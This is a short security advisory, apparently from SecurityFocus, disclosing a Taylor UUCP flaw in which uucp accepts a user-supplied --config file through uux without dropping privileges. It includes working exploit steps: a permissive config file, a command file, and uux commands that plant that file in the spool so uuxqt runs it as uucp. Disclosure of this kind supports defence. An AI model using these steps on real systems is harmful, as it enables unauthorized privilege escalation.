Taylor UUCP Argument Handling Privilege Elevation Vulnerability

Contributed by Zenith Parsec <zen-parse@gmx.net>:

uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'

will use the supplied configuration, without dropping privileges.

1) Make a configuration file that allows any command to be executed, and allows files from anywhere to be copied to anywhere that is writable by uid/gid uucp. ( /tmp/config.uucp )
2) Make a command file with the command you want to be executed.
( /tmp/commands.uucp )
3) Do something like the following:

$ THISHOST=`uuname -l`
$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
$ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}

The commands in /tmp/commands.uucp file will be executed by uuxqt, with the uid/gid of uucp.


Privacy Statement
Copyright 2010, SecurityFocus